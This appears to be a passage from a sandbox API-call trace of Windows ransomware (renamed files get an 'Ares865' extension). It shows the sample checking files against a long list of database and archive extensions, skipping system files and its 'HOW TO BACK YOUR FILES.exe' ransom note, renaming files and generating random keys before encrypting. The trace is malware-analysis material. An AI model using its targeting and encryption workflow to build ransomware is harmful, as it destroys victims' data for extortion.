1 [0060.177] lstrlenW (lpString="his") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.177] lstrlenW (lpString="ib") returned 2 [0060.177] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.177] lstrlenW (lpString="idb") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.177] lstrlenW (lpString="ihx") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.177] lstrlenW (lpString="itdb") returned 4 [0060.177] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.177] lstrlenW (lpString="itw") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.177] lstrlenW (lpString="jet") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.177] lstrlenW (lpString="jtx") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.177] lstrlenW (lpString="kdb") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.177] lstrlenW (lpString="kexi") returned 4 [0060.177] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.177] lstrlenW (lpString="kexic") returned 5 [0060.177] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.178] lstrlenW (lpString="kexis") returned 5 [0060.178] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.178] lstrlenW (lpString="lgc") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.178] lstrlenW (lpString="lwx") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.178] lstrlenW (lpString="maf") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.178] lstrlenW (lpString="maq") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.178] lstrlenW (lpString="mar") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.178] lstrlenW (lpString="marshal") returned 7 [0060.178] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.178] lstrlenW (lpString="mas") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.178] lstrlenW (lpString="mav") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.178] lstrlenW (lpString="maw") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.178] lstrlenW (lpString="mdbhtml") returned 7 [0060.178] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.178] lstrlenW (lpString="mdn") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.178] lstrlenW (lpString="mdt") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.178] lstrlenW (lpString="mfd") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.178] lstrlenW (lpString="mpd") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.178] lstrlenW (lpString="mrg") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.178] lstrlenW (lpString="mud") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.178] lstrlenW (lpString="mwb") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.178] lstrlenW (lpString="myd") returned 3 [0060.178] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.179] lstrlenW (lpString="ndf") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.179] lstrlenW (lpString="nnt") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.179] lstrlenW (lpString="nrmlib") returned 6 [0060.179] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.179] lstrlenW (lpString="ns2") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.179] lstrlenW (lpString="ns3") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.179] lstrlenW (lpString="ns4") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.179] lstrlenW (lpString="nsf") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.179] lstrlenW (lpString="nv") returned 2 [0060.179] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.179] lstrlenW (lpString="nv2") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.179] lstrlenW (lpString="nwdb") returned 4 [0060.179] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.179] lstrlenW (lpString="nyf") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.179] lstrlenW (lpString="odb") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.179] lstrlenW (lpString="odb") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.179] lstrlenW (lpString="oqy") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.179] lstrlenW (lpString="ora") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.179] lstrlenW (lpString="orx") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.179] lstrlenW (lpString="owc") returned 3 [0060.179] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.179] lstrlenW (lpString="p96") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.180] lstrlenW (lpString="p97") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.180] lstrlenW (lpString="pan") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.180] lstrlenW (lpString="pdb") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.180] lstrlenW (lpString="pdm") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.180] lstrlenW (lpString="pnz") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.180] lstrlenW (lpString="qry") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.180] lstrlenW (lpString="qvd") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.180] lstrlenW (lpString="rbf") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.180] lstrlenW (lpString="rctd") returned 4 [0060.180] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.180] lstrlenW (lpString="rod") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.180] lstrlenW (lpString="rodx") returned 4 [0060.180] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.180] lstrlenW (lpString="rpd") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.180] lstrlenW (lpString="rsd") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.180] lstrlenW (lpString="sas7bdat") returned 8 [0060.180] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.180] lstrlenW (lpString="sbf") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.180] lstrlenW (lpString="scx") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.180] lstrlenW (lpString="sdb") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.180] lstrlenW (lpString="sdc") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.180] lstrlenW (lpString="sdf") returned 3 [0060.180] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.181] lstrlenW (lpString="sis") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.181] lstrlenW (lpString="spq") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.181] lstrlenW (lpString="te") returned 2 [0060.181] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.181] lstrlenW (lpString="teacher") returned 7 [0060.181] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.181] lstrlenW (lpString="tmd") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.181] lstrlenW (lpString="tps") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.181] lstrlenW (lpString="trc") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.181] lstrlenW (lpString="trc") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.181] lstrlenW (lpString="trm") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.181] lstrlenW (lpString="udb") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.181] lstrlenW (lpString="udl") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.181] lstrlenW (lpString="usr") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.181] lstrlenW (lpString="v12") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.181] lstrlenW (lpString="vis") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.181] lstrlenW (lpString="vpd") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.181] lstrlenW (lpString="vvv") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.181] lstrlenW (lpString="wdb") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.181] lstrlenW (lpString="wmdb") returned 4 [0060.181] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.181] lstrlenW (lpString="wrk") returned 3 [0060.181] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.182] lstrlenW (lpString="xdb") returned 3 [0060.182] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.182] lstrlenW (lpString="xld") returned 3 [0060.182] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.182] lstrlenW (lpString="xmlff") returned 5 [0060.182] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.182] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini.Ares865") returned 93 [0060.182] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.182] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.183] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0060.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.183] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.184] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.184] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.184] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x164 [0060.186] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0060.187] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.187] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.187] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.188] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.188] CloseHandle (hObject=0x164) returned 1 [0060.188] CloseHandle (hObject=0x15c) returned 1 [0060.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.190] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4bc500, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.190] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.190] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e3cd240, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="aoldtz.exe") returned 1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2=".") returned 1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="..") returned 1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="windows") returned -1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="bootmgr") returned 1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="temp") returned -1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="pagefile.sys") returned -1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="boot") returned 1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="ids.txt") returned 1 [0060.190] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0060.191] lstrcmpiW (lpString1="index.dat", lpString2="perflogs") returned -1 [0060.191] lstrcmpiW (lpString1="index.dat", lpString2="MSBuild") returned -1 [0060.191] lstrlenW (lpString="index.dat") returned 9 [0060.191] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 85 [0060.191] lstrcpyW (in: lpString1=0x2cce494, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0060.191] lstrlenW (lpString="index.dat") returned 9 [0060.191] lstrlenW (lpString="Ares865") returned 7 [0060.191] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0060.191] lstrlenW (lpString=".dll") returned 4 [0060.191] lstrcmpiW (lpString1="index.dat", lpString2=".dll") returned 1 [0060.191] lstrlenW (lpString=".lnk") returned 4 [0060.191] lstrcmpiW (lpString1="index.dat", lpString2=".lnk") returned 1 [0060.191] lstrlenW (lpString=".ini") returned 4 [0060.191] lstrcmpiW (lpString1="index.dat", lpString2=".ini") returned 1 [0060.191] lstrlenW (lpString=".sys") returned 4 [0060.191] lstrcmpiW (lpString1="index.dat", lpString2=".sys") returned 1 [0060.191] lstrlenW (lpString="index.dat") returned 9 [0060.191] lstrlenW (lpString="bak") returned 3 [0060.191] lstrcmpiW (lpString1="dat", lpString2="bak") returned 1 [0060.191] lstrlenW (lpString="ba_") returned 3 [0060.191] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0060.191] lstrlenW (lpString="dbb") returned 3 [0060.191] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0060.191] lstrlenW (lpString="vmdk") returned 4 [0060.191] lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0060.191] lstrlenW (lpString="rar") returned 3 [0060.191] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0060.191] lstrlenW (lpString="zip") returned 3 [0060.191] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0060.191] lstrlenW (lpString="tgz") returned 3 [0060.191] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0060.191] lstrlenW (lpString="vbox") returned 4 [0060.191] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0060.191] lstrlenW (lpString="vdi") returned 3 [0060.191] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0060.191] lstrlenW (lpString="vhd") returned 3 [0060.191] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0060.191] lstrlenW (lpString="vhdx") returned 4 [0060.192] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0060.192] lstrlenW (lpString="avhd") returned 4 [0060.192] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0060.192] lstrlenW (lpString="db") returned 2 [0060.192] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0060.192] lstrlenW (lpString="db2") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0060.192] lstrlenW (lpString="db3") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0060.192] lstrlenW (lpString="dbf") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0060.192] lstrlenW (lpString="mdf") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0060.192] lstrlenW (lpString="mdb") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0060.192] lstrlenW (lpString="sql") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0060.192] lstrlenW (lpString="sqlite") returned 6 [0060.192] lstrcmpiW (lpString1="ex.dat", lpString2="sqlite") returned -1 [0060.192] lstrlenW (lpString="sqlite3") returned 7 [0060.192] lstrcmpiW (lpString1="dex.dat", lpString2="sqlite3") returned -1 [0060.192] lstrlenW (lpString="sqlitedb") returned 8 [0060.192] lstrcmpiW (lpString1="ndex.dat", lpString2="sqlitedb") returned -1 [0060.192] lstrlenW (lpString="xml") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0060.192] lstrlenW (lpString="$er") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0060.192] lstrlenW (lpString="4dd") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0060.192] lstrlenW (lpString="4dl") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0060.192] lstrlenW (lpString="^^^") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0060.192] lstrlenW (lpString="abs") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0060.192] lstrlenW (lpString="abx") returned 3 [0060.192] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0060.192] lstrlenW (lpString="accdb") returned 5 [0060.193] lstrcmpiW (lpString1="x.dat", lpString2="accdb") returned 1 [0060.193] lstrlenW (lpString="accdc") returned 5 [0060.193] lstrcmpiW (lpString1="x.dat", lpString2="accdc") returned 1 [0060.193] lstrlenW (lpString="accde") returned 5 [0060.193] lstrcmpiW (lpString1="x.dat", lpString2="accde") returned 1 [0060.193] lstrlenW (lpString="accdr") returned 5 [0060.193] lstrcmpiW (lpString1="x.dat", lpString2="accdr") returned 1 [0060.193] lstrlenW (lpString="accdt") returned 5 [0060.193] lstrcmpiW (lpString1="x.dat", lpString2="accdt") returned 1 [0060.193] lstrlenW (lpString="accdw") returned 5 [0060.193] lstrcmpiW (lpString1="x.dat", lpString2="accdw") returned 1 [0060.193] lstrlenW (lpString="accft") returned 5 [0060.193] lstrcmpiW (lpString1="x.dat", lpString2="accft") returned 1 [0060.193] lstrlenW (lpString="adb") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0060.193] lstrlenW (lpString="adb") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0060.193] lstrlenW (lpString="ade") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0060.193] lstrlenW (lpString="adf") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0060.193] lstrlenW (lpString="adn") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0060.193] lstrlenW (lpString="adp") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0060.193] lstrlenW (lpString="alf") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0060.193] lstrlenW (lpString="ask") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0060.193] lstrlenW (lpString="btr") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0060.193] lstrlenW (lpString="cat") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0060.193] lstrlenW (lpString="cdb") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0060.193] lstrlenW (lpString="ckp") returned 3 [0060.193] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0060.193] lstrlenW (lpString="cma") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0060.194] lstrlenW (lpString="cpd") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0060.194] lstrlenW (lpString="dacpac") returned 6 [0060.194] lstrcmpiW (lpString1="ex.dat", lpString2="dacpac") returned 1 [0060.194] lstrlenW (lpString="dad") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0060.194] lstrlenW (lpString="dadiagrams") returned 10 [0060.194] lstrlenW (lpString="daschema") returned 8 [0060.194] lstrcmpiW (lpString1="ndex.dat", lpString2="daschema") returned 1 [0060.194] lstrlenW (lpString="db-journal") returned 10 [0060.194] lstrlenW (lpString="db-shm") returned 6 [0060.194] lstrcmpiW (lpString1="ex.dat", lpString2="db-shm") returned 1 [0060.194] lstrlenW (lpString="db-wal") returned 6 [0060.194] lstrcmpiW (lpString1="ex.dat", lpString2="db-wal") returned 1 [0060.194] lstrlenW (lpString="dbc") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0060.194] lstrlenW (lpString="dbs") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0060.194] lstrlenW (lpString="dbt") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0060.194] lstrlenW (lpString="dbv") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0060.194] lstrlenW (lpString="dbx") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0060.194] lstrlenW (lpString="dcb") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0060.194] lstrlenW (lpString="dct") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dct") returned -1 [0060.194] lstrlenW (lpString="dcx") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dcx") returned -1 [0060.194] lstrlenW (lpString="ddl") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="ddl") returned -1 [0060.194] lstrlenW (lpString="dlis") returned 4 [0060.194] lstrcmpiW (lpString1=".dat", lpString2="dlis") returned -1 [0060.194] lstrlenW (lpString="dp1") returned 3 [0060.194] lstrcmpiW (lpString1="dat", lpString2="dp1") returned -1 [0060.194] lstrlenW (lpString="dqy") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="dqy") returned -1 [0060.195] lstrlenW (lpString="dsk") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="dsk") returned -1 [0060.195] lstrlenW (lpString="dsn") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="dsn") returned -1 [0060.195] lstrlenW (lpString="dtsx") returned 4 [0060.195] lstrcmpiW (lpString1=".dat", lpString2="dtsx") returned -1 [0060.195] lstrlenW (lpString="dxl") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="dxl") returned -1 [0060.195] lstrlenW (lpString="eco") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="eco") returned -1 [0060.195] lstrlenW (lpString="ecx") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="ecx") returned -1 [0060.195] lstrlenW (lpString="edb") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="edb") returned -1 [0060.195] lstrlenW (lpString="epim") returned 4 [0060.195] lstrcmpiW (lpString1=".dat", lpString2="epim") returned -1 [0060.195] lstrlenW (lpString="fcd") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="fcd") returned -1 [0060.195] lstrlenW (lpString="fdb") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="fdb") returned -1 [0060.195] lstrlenW (lpString="fic") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="fic") returned -1 [0060.195] lstrlenW (lpString="flexolibrary") returned 12 [0060.195] lstrlenW (lpString="fm5") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="fm5") returned -1 [0060.195] lstrlenW (lpString="fmp") returned 3 [0060.195] lstrcmpiW (lpString1="dat", lpString2="fmp") returned -1 [0060.195] lstrlenW (lpString="fmp12") returned 5 [0060.195] lstrcmpiW (lpString1="x.dat", lpString2="fmp12") returned 1 [0060.195] lstrlenW (lpString="fmpsl") returned 5 [0060.195] lstrcmpiW (lpString1="x.dat", lpString2="fmpsl") returned 1 [0060.195] 